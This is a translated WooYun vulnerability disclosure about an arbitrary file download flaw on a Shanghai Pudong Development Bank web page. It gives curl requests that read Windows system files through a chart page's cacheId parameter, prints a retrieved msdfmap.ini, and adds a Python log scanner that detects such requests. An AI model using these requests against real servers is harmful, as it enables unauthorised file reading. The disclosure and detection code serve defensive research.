Vulnerability summary

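Bug ID: wooyun-2015-0153394

Title: Arbitrary file traversal on a Shanghai Pudong Development Bank site

Vendor: Shanghai Pudong Development Bank

Reporter: 路人甲

Submitted: 2015-11-10 17:59

Fixed: 2016-01-11 15:32

Publicly disclosed: 2016-01-11 15:32

Vulnerability type: Arbitrary file traversal/download

Severity: High

Self-assessed Rank: 12

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]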


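Vulnerability details

Disclosure status:

2015-11-10: Details reported to the vendor; awaiting vendor handling
2015-11-20: Vendor confirmed; details disclosed to the vendor only
2015-11-30: Details disclosed to core white hats and experts in related fields
2015-12-10: Details disclosed to regular white hats
2015-12-20: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

RT

Detailed description: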

curl -i http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/win.ini


Proof:

curl http://**.**.**.**/Chart/OilChart.aspx\?ChartDirectorChartImage\=chart_fxChart\&cacheDefeat\=635826864174711701\&cacheId\=c:/windows/msdfmap.ini

;[connect name] will modify the connection if ADC.connect="name"
;[connect default] will modify the connection if name is not found
;[sql name] will modify the Sql if ADC.sql="name(args)"
;[sql default] will modify the Sql if name is not found
;Override strings: Connect, UserId, Password, Sql.
;Only the Sql strings support parameters using "?"
;The override strings must not equal "" or they are ignored
;A Sql entry must exist in each sql section or the section is ignored
;An Access entry must exist in each connect section or the section is ignored
;Access=NoAccess
;Access=ReadOnly
;Access=ReadWrite
;[userlist name] allows specific users to have special access
;The Access is computed as follows:
; (1) First take the access of the connect section.
; (2) If a user entry is found, it will override.
[connect default]
;If we want to disable unknown connect values, we set Access to NoAccess
Access=NoAccess
[sql default]
;If we want to disable unknown sql values, we set Sql to an invalid query.
Sql=" "
[connect CustomerDatabase]
Access=ReadWrite
Connect="DSN=AdvWorks"
[sql CustomerById]
Sql="SELECT * FROM Customers WHERE CustomerID = ?"
[connect AuthorDatabase]
Access=ReadOnly
Connect="DSN=MyLibraryInfo;UID=MyUserID;PWD=MyPassword"
[userlist AuthorDatabase]
Administrator=ReadWrite
[sql AuthorById]
Sql="SELECT * FROM Authors WHERE au_id = ?"

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云
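An added detection example, not part of the original report: it scans web server logs for chart-image requests like the ones above whose cacheId is a file path instead of a cache token. It assumes IIS W3C-style logs and that a legitimate cacheId is a short opaque token; the sample log lines, IP addresses and the benign cacheId are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote

# Assumption (not from the report): a legitimate cacheId is a short opaque token.
OPAQUE_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Constructed IIS W3C-style sample; IPs and the benign cacheId are made up.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-11-10 09:58:01 192.0.2.10 GET /Chart/OilChart.aspx ChartDirectorChartImage=chart_fxChart&cacheDefeat=635826864174711701&cacheId=3f9a1c77e2 200
2015-11-10 09:59:12 192.0.2.44 GET /Chart/OilChart.aspx ChartDirectorChartImage=chart_fxChart&cacheDefeat=635826864174711701&cacheId=c:/windows/win.ini 200
2015-11-10 09:59:40 192.0.2.44 GET /Chart/OilChart.aspx chartdirectorchartimage=chart_fxChart&CACHEID=c%3A%5Cwindows%5Cmsdfmap.ini 200
2015-11-10 10:00:03 192.0.2.10 GET /index.aspx - 200
"""

def fully_decode(value, max_rounds=3):
    """Normalize nested percent-encoding before the value is inspected."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_cache_id(query):
    """Return the decoded cacheId when a chart-image request carries a cacheId
    that is not an opaque token (drive letter, slash, dot, ...), else None."""
    # ASP.NET treats query-string keys case-insensitively, so compare lowercased.
    params = {k.lower(): v for k, v in parse_qsl(query, keep_blank_values=True)}
    if "chartdirectorchartimage" not in params or "cacheid" not in params:
        return None
    cache_id = fully_decode(params["cacheid"])
    return None if OPAQUE_ID.fullmatch(cache_id) else cache_id

def scan(log_text):
    """Yield (client_ip, decoded_cacheId) for every flagged W3C log line."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            hit = suspicious_cache_id(row.get("cs-uri-query", ""))
            if hit is not None:
                yield row["c-ip"], hit

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip} requested chart cache file {value!r}")
```

The same allowlist check, applied server-side before cacheId is used to locate a file, rejects the requests shown in the report.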


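Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-11-20 17:10

Vendor reply:

CNVD confirmed and reproduced the reported issue. It has been passed via CNCERT to the banking sector's IT regulatory authority, which will coordinate follow-up handling with the website's operator; it has also been forwarded via CNCERT to the Shanghai branch center.

Latest status:

None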